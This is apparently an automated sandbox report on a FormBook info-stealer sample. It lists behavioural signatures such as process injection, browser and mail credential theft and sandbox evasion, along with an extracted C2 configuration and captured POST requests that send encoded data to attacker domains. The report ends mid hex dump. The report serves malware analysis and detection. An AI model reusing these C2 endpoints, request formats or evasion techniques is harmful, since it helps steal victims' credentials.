Windows Analysis Report
CV.bat.exe

Overview

General Information

Sample Name: CV.bat.exe
Analysis ID: 715070
MD5: 40372d67f0de4526f04fba7948f7ff02
SHA1: f1c8f97bd587125f6c48fb5e80bd191bff253a97
SHA256: 8bdbc254d871d5f2ffbdc50ea20070910cfa9c1be2b114ae1077ebc7b6d245d2
Tags: exeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: CV.bat.exe ReversingLabs: Detection: 33%
Source: CV.bat.exe Virustotal: Detection: 34% Perma Link
Yara detected FormBook
Source: Yara match File source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe ReversingLabs: Detection: 33%
Machine Learning detection for sample
Source: CV.bat.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe Joe Sandbox ML: detected
Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.miarizzuto.org/redb/"], "decoy": ["p38MheawG5TlW4TfEW6HgnBkENlaHA==", "F+wu9lADd7UfKolzCb9JriAY5iBtDQ==", "PMgcpd10tc8LZXzLxv4=", "4aYRlQCb7ZZngur8q5Rm3kIG7S0=", "gae+T40jXAwQNntTjeU=", "nDNoH34RcgfW/T4Ywoj4GxdCtw==", "FubuYrVZyeowZKOpSkjwGxdCtw==", "NsZyQ5lBhfS7M1Yx4Q==", "ShBaHnokZaIGGCu+v/w=", "lWJW3gysIs6U7DGWty1OHzCrue9z", "qsjESV5CtJxV0SgCbsJewg==", "P+EX8vkyJWffLEtt97JEwA==", "z/cJhdNs94kvQZJi2VN6Q+7grOZx", "AdeUdb1hY9RKdOmFObn0", "4IR+FFv7MeHN6Cf+bsJewg==", "1qYHwBCj8omX9xww4w==", "EqleInYijmBzntqzWkNfsmA=", "wdDzwzcDOKBinhcAbsJewg==", "krhiJnYVgPe19Ug47cFafWXBYNNeHA==", "XvZT4SS4I5z7I4KPKwE1rUXn", "3+jWW9Cjn6CDtRam33vCu29XvQ==", "fixwUsqR/Bhvoxelu8p62kIG7S0=", "+xZKR0ZmPHiNmA==", "s+wCc7RamYK1zRtqV4tu20IG7S0=", "Adpp4DwAZvKTqQTutY78GxdCtw==", "ENoh3DrcN71TZZ7yuDwz7hb4", "hVdX90DrOpYeTLlSjDqBHsUhvw==", "JLDfpyXXPZoFE3hUyUMtOjPw", "vcxK310Uizkei4li+g==", "jVoz8Wo8fftcy0Y19A==", "/9NY2EQWgeFpnOE4PpKhiEIG7S0=", "VWWBP5ApimC5WSu+v/w=", "/4jic9h447GVpPjaiJJDt1OWV9Tjrj8=", "Q3IXW01pPHiNmA==", "zu5p800BTjnc+HBX", "sHpILIYjPHiNmA==", "kzZ3NXccc1VJU6b8CQlYPzCgLCU=", "JkDjrfap8OwGNo5l7b9NWnBWAjF/FA==", "eZ7YtfuZDNykFpLz6w==", "+xCzdKQ4l9xjnPSCps41rUXn", "AMBRFYdNtwxsbtm0MnMRgmA=", "0PqdgNaF09X4IpumBiOU2w==", "LDOgG3QmrIdnh8xlQdT+", "WHr+gr5vzOwXZXzLxv4=", "1HCmeNBTwkgPOjMZues=", "Ey2VG0fZDBIARaZZ", "omKAbliAi+N88WFM", "o8Istv946qZPd/DSVxaBI4qcKDo=", "yJ7urxrQGzh79xww4w==", "gSagOLSM94AnZcIgNHEE7BT4", "Qw4NhuR+4wY8YNlKd/QdAD0o6KjhuZtdtA==", "fpkQmAa5Mc1bbcRlQdT+", "WCBsPKxZzVzxCUvUCwdC1Hc=", "jjsM3i7VLQYqPqEIITscq1fmBgp5Aw==", "RdisRWOCpYiFmQ==", "Hry/mxIQHqRu", "7fuXY96T/ZEkivUHv5X2", "xtp9W9eNjxd/5Oc6RFa1YB5DtQ==", "pMfOU5EWV01pdcMiPlQNWrZT/zQ=", "jUmgKGL5a/tcy0Y19A==", "pkrCW5s1rBqi3FXkFa4A3QGrue9z", "uYslkvGb8iFcy0Y19A==", "S9y7PZ5kwHP1PZLg2vCU3Q==", "DalTG28tlbdvpPQ="]}
Uses 32bit PE files
Source: CV.bat.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: CV.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: CV.bat.exe, 00000008.00000003.301579831.0000000001080000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000003.297213118.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.417519841.00000000054B4000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.531741340.0000000005800000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.421300076.000000000566D000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.533143376.000000000591F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: CV.bat.exe, CV.bat.exe, 00000008.00000003.301579831.0000000001080000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000003.297213118.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.417519841.00000000054B4000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.531741340.0000000005800000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.421300076.000000000566D000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.533143376.000000000591F000.00000040.00000800.00020000.00000000.sdmp

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.hipnoterapia.store
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 63.141.242.46 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.yaignars.site
Source: C:\Windows\explorer.exe Domain query: www.miarizzuto.org
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.miarizzuto.org/redb/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SEDO-ASDE SEDO-ASDE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /redb/?SrNH_=ZbLl4nlXWVx&WvMH=ClEE/ZchhSWI9Fw4wt/3uVHiPVKnhBdsoB1lL7XTwBZGLskW0dT3J+GyfBiSRlOqjq3/13+wQlUMF9TRa7Zw+CqEhvu+ka1r7A== HTTP/1.1Host: www.miarizzuto.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /redb/?SrNH_=ZbLl4nlXWVx&WvMH=sSqPgCldjkbi0+fTeRrTo1yeRkXijBFS3eCOWeLwWqlRfT02SfRof0res+4jmsjJUPdu+dXwzSVFQdySZWLfkZF8oXotr+qwUQ== HTTP/1.1Host: www.yaignars.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.195.240.94 91.195.240.94
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /redb/ HTTP/1.1Host: www.yaignars.siteConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.yaignars.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.yaignars.site/redb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 37 50 4c 37 55 67 7a 45 72 67 32 41 54 57 33 4c 6c 6e 67 71 68 73 62 6d 56 63 54 41 64 63 31 4d 56 77 31 56 41 50 64 5f 65 6c 61 43 6f 50 41 6a 74 4f 66 56 53 2d 42 32 70 39 54 6f 74 41 41 67 55 65 6d 66 43 48 7a 61 75 2d 6f 57 6e 42 73 54 69 39 33 62 52 47 30 47 69 32 45 74 65 6a 63 51 69 55 6e 33 7e 52 64 4c 72 39 67 53 30 44 74 7a 57 7a 32 69 4e 4b 7a 65 49 35 54 77 71 67 76 4c 28 66 7e 6f 54 70 55 31 6d 50 6a 7a 34 6f 56 33 77 34 62 4f 33 36 37 47 66 78 74 2d 55 63 68 42 69 73 62 36 59 65 68 6c 72 72 47 30 56 73 61 57 33 41 6a 34 6e 59 52 73 34 51 76 5a 6d 54 52 31 43 4e 6f 4f 6c 35 6f 31 28 6c 50 61 35 32 41 31 57 65 75 5f 6b 59 5a 69 71 6f 39 66 55 6b 4d 30 4a 4f 41 77 79 4d 42 41 72 34 61 2d 65 76 62 45 51 6c 45 48 50 33 42 77 70 43 71 2d 31 44 50 53 32 73 6f 55 46 43 55 51 57 66 68 58 54 65 79 4e 45 56 53 51 38 76 28 48 68 30 45 52 71 41 30 33 64 55 75 4a 63 78 4f 77 42 4a 38 61 49 68 65 36 28 37 38 6c 65 66 37 62 4a 74 48 75 72 66 67 65 79 78 78 72 4b 4c 33 2d 41 76 6a 63 4f 78 51 34 67 73 70 6c 58 69 5a 6f 58 4f 45 53 6b 53 5a 71 57 65 44 76 41 61 38 51 6e 61 44 6b 49 77 42 48 55 7a 79 68 76 7a 42 49 37 65 56 6f 33 4b 69 48 64 6b 41 4e 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: WvMH=hQCvjyR4iH7W7PL7UgzErg2ATW3LlngqhsbmVcTAdc1MVw1VAPd_elaCoPAjtOfVS-B2p9TotAAgUemfCHzau-oWnBsTi93bRG0Gi2EtejcQiUn3~RdLr9gS0DtzWz2iNKzeI5TwqgvL(f~oTpU1mPjz4oV3w4bO367Gfxt-UchBisb6YehlrrG0VsaW3Aj4nYRs4QvZmTR1CNoOl5o1(lPa52A1Weu_kYZiqo9fUkM0JOAwyMBAr4a-evbEQlEHP3BwpCq-1DPS2soUFCUQWfhXTeyNEVSQ8v(Hh0ERqA03dUuJcxOwBJ8aIhe6(78lef7bJtHurfgeyxxrKL3-AvjcOxQ4gsplXiZoXOESkSZqWeDvAa8QnaDkIwBHUzyhvzBI7eVo3KiHdkANRg).
Source: global traffic HTTP traffic detected: POST /redb/ HTTP/1.1Host: www.yaignars.siteConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.yaignars.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.yaignars.site/redb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 36 38 54 37 54 54 62 45 6a 41 32 41 62 32 33 4e 6c 6e 67 68 68 73 62 69 56 66 66 51 64 72 4a 4d 55 68 46 56 41 64 46 5f 64 6c 61 42 6e 76 41 5a 67 75 66 45 53 2d 42 51 70 39 66 6f 74 41 55 67 55 66 32 66 43 56 62 62 76 2d 70 77 30 78 73 55 7a 4e 33 4f 52 47 35 46 69 7a 38 74 65 68 55 51 69 48 66 33 39 44 31 49 67 39 67 58 33 44 74 34 64 54 32 75 4e 4b 7a 77 49 35 54 61 71 69 58 4c 38 76 75 6f 63 72 38 30 31 76 6a 79 37 6f 55 72 68 4e 32 57 78 4b 66 30 59 7a 6b 47 44 39 67 71 71 5f 44 77 46 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: WvMH=hQCvjyR4iH7W68T7TTbEjA2Ab23NlnghhsbiVffQdrJMUhFVAdF_dlaBnvAZgufES-BQp9fotAUgUf2fCVbbv-pw0xsUzN3ORG5Fiz8tehUQiHf39D1Ig9gX3Dt4dT2uNKzwI5TaqiXL8vuocr801vjy7oUrhN2WxKf0YzkGD9gqq_DwFA).
Source: global traffic HTTP traffic detected: POST /redb/ HTTP/1.1Host: www.yaignars.siteConnection: closeContent-Length: 5334Cache-Control: no-cacheOrigin: http://www.yaignars.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.yaignars.site/redb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 37 63 6a 37 57 77 7a 45 6d 67 33 79 65 32 33 4e 28 58 67 74 68 73 58 69 56 63 54 41 64 65 52 4d 56 32 4a 56 41 5f 64 5f 66 6c 61 42 32 66 41 6a 74 4f 66 57 53 2d 56 6d 70 38 75 54 74 43 34 67 56 4e 7e 66 55 6c 62 61 67 2d 6f 58 31 78 73 54 73 64 33 4f 52 48 46 7a 69 33 6f 58 65 68 63 51 69 55 48 33 39 42 64 4c 68 74 67 53 34 6a 74 34 64 53 4b 68 4e 4b 7a 4b 49 35 37 4b 71 68 66 4c 7e 38 32 6f 65 36 38 31 38 66 6a 78 34 6f 55 34 74 6f 66 42 33 36 32 48 66 78 59 6c 55 61 6c 42 69 4d 62 36 5a 62 56 6c 6b 4c 47 31 59 38 61 56 33 42 66 47 6e 59 4a 73 34 52 62 57 6e 69 4a 31 44 74 34 4f 6d 61 41 32 71 6c 50 6d 79 57 42 74 45 65 79 67 6b 59 4a 6d 71 70 6c 66 55 51 55 30 49 5f 41 77 78 75 5a 41 76 59 61 36 65 76 62 31 64 46 49 65 50 33 63 6a 70 47 32 2d 31 30 76 53 33 2d 77 55 45 54 55 51 44 5f 68 57 55 65 79 49 45 56 53 79 38 76 4c 48 68 30 59 72 71 43 51 33 61 46 65 4a 4c 78 4f 78 4a 4a 38 64 57 78 65 57 37 37 39 55 65 63 58 68 4a 74 57 54 71 76 38 65 78 32 64 72 4b 63 44 2d 4e 66 6a 64 4c 78 51 35 67 73 6c 4b 58 69 31 4f 58 4b 51 53 6c 69 68 71 57 66 7a 76 4e 74 6f 51 6f 36 44 6c 43 51 41 6d 53 54 44 4b 68 43 4e 57 30 38 35 36 32 74 7e 54 55 57 42 6b 54 57 57 67 46 33 63 2d 47 4f 78 69 65 34 69 79 45 70 66 79 5a 64 38 64 39 31 69 63 65 63 33 4b 6c 42 74 4f 30 6d 32 66 31 42 68 56 6a 75 6e 71 58 67 31 2d 31 47 4c 35 65 30 6b 73 50 39 32 61 6c 69 69 36 4e 7a 42 6c 37 43 39 65 6c 4a 28 69 53 4b 68 4d 64 73 62 69 57 5a 75 4f 70 54 4c 4b 57 36 77 43 37 43 4d 4a 52 6c 69 64 7e 50 73 59 75 67 35 30 70 67 4e 35 34 52 5a 35 46 77 65 63 6c 4e 36 33 31 79 4d 6f 72 79 41 48 36 37 75 2d 6e 6c 38 41 78 51 34 38 31 61 56 61 68 47 71 53 6a 34 57 67 69 50 5a 66 74 74 55 6f 47 66 6f 4c 67 76 30 69 68 6b 57 51 4e 75 54 54 48 41 39 44 51 4f 59 37 32 73 6d 4e 74 61 68 35 39 45 70 48 7e 72 43 48 50 75 30 66 76 73 7e 69 61 43 30 32 62 6d 4f 78 31 43 69 47 61 4a 73 6c 6b 66 65 67 58 67 34 32 52 56 67 68 63 55 57 61 61 54 6f 54 52 55 37 64 58 77 47 37 50 32 76 75 4f 7a 58 57 37 6c 6e 66 4e 71 33 54 77 52 6b 56 65 41 47 2d 50 46 61 6b 6f 56 78 61 58 48 33 66 33 69 52 70 7e 77 4d 55 4e 32 4b 41 67 41 58 46 41 55 31 42 62 72 6b 76 4c 7a 63 52 55 38 67 55 7a 72 43 32 7a 70 77 37 6e 48 6e 73 67 67 73 58 6b 35 77 4c 4a 70 6d 50 32 53 64 33 5a 74 58 7a 4a 6e 52 78 34 55 70 4f 71 54 6d 74 64 6e 57 69 52 7a 4a 58 35 70 73 67 75 38 68 7a 62 71 6c 63 70 69 67 37 56 54 49 6e 6a 56 6f 69 66 59 66 46 67 52 37 61 31 71 63 2d 61 31 63 46 76 50 44 69 37 56 36 34 50 68 45 55 59 61 6c 46 72 37 6b 53 52 56 77 78 33 38 79 53 41 74 59 30 67 4b 79 4c 6
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 03 Oct 2022 13:57:25 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 03 Oct 2022 13:57:28 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 03 Oct 2022 13:57:30 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: chkdsk.exe, 00000011.00000002.534772213.000000000622A000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://img.sedoparking.com
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chkdsk.exe, 00000011.00000002.534712310.0000000005F06000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://survey-smiles.com
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000000.00000002.302134745.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: CV.bat.exe, 00000000.00000002.302134745.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comgrito
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: f-0386u9.17.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: f-0386u9.17.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: f-0386u9.17.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: f-0386u9.17.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: f-0386u9.17.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: f-0386u9.17.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chkdsk.exe, 00000011.00000002.534772213.000000000622A000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.name.com/domain/renew/yaignars.site?utm_source=Sedo_parked_page&utm_medium=button&utm_ca
Source: chkdsk.exe, 00000011.00000002.534772213.000000000622A000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: unknown HTTP traffic detected: POST /redb/ HTTP/1.1Host: www.yaignars.siteConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.yaignars.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.yaignars.site/redb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 37 50 4c 37 55 67 7a 45 72 67 32 41 54 57 33 4c 6c 6e 67 71 68 73 62 6d 56 63 54 41 64 63 31 4d 56 77 31 56 41 50 64 5f 65 6c 61 43 6f 50 41 6a 74 4f 66 56 53 2d 42 32 70 39 54 6f 74 41 41 67 55 65 6d 66 43 48 7a 61 75 2d 6f 57 6e 42 73 54 69 39 33 62 52 47 30 47 69 32 45 74 65 6a 63 51 69 55 6e 33 7e 52 64 4c 72 39 67 53 30 44 74 7a 57 7a 32 69 4e 4b 7a 65 49 35 54 77 71 67 76 4c 28 66 7e 6f 54 70 55 31 6d 50 6a 7a 34 6f 56 33 77 34 62 4f 33 36 37 47 66 78 74 2d 55 63 68 42 69 73 62 36 59 65 68 6c 72 72 47 30 56 73 61 57 33 41 6a 34 6e 59 52 73 34 51 76 5a 6d 54 52 31 43 4e 6f 4f 6c 35 6f 31 28 6c 50 61 35 32 41 31 57 65 75 5f 6b 59 5a 69 71 6f 39 66 55 6b 4d 30 4a 4f 41 77 79 4d 42 41 72 34 61 2d 65 76 62 45 51 6c 45 48 50 33 42 77 70 43 71 2d 31 44 50 53 32 73 6f 55 46 43 55 51 57 66 68 58 54 65 79 4e 45 56 53 51 38 76 28 48 68 30 45 52 71 41 30 33 64 55 75 4a 63 78 4f 77 42 4a 38 61 49 68 65 36 28 37 38 6c 65 66 37 